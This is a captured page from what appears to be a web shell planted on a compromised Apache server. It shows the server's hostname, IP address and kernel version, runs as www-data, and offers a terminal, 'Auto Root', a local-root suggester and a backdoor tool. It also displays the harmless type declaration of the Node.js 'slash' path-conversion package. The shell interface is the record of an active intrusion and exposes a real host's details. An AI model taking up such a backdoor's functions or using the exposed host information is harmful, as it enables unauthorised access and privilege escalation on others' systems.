Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
slash /
Delete
Unzip
Name
Size
Permission
Date
Action
index.d.ts
600
B
-rw-r--r--
2022-04-10 17:31
index.js
289
B
-rw-r--r--
2022-04-10 17:31
index.mjs
285
B
-rw-r--r--
2022-04-10 17:31
package.json
778
B
-rw-r--r--
2022-04-10 17:31
Save
Rename
/** Convert Windows backslash paths to slash paths: `foo\\bar` ➔ `foo/bar`. [Forward-slash paths can be used in Windows](http://superuser.com/a/176395/6877) as long as they're not extended-length paths and don't contain any non-ascii characters. @param path - A Windows backslash path. @returns A path with forward slashes. @example ``` import path from 'path'; import slash from 'slash'; const string = path.join('foo', 'bar'); // Unix => foo/bar // Windows => foo\\bar slash(string); // Unix => foo/bar // Windows => foo/bar ``` */ export default function slash(path: string): string;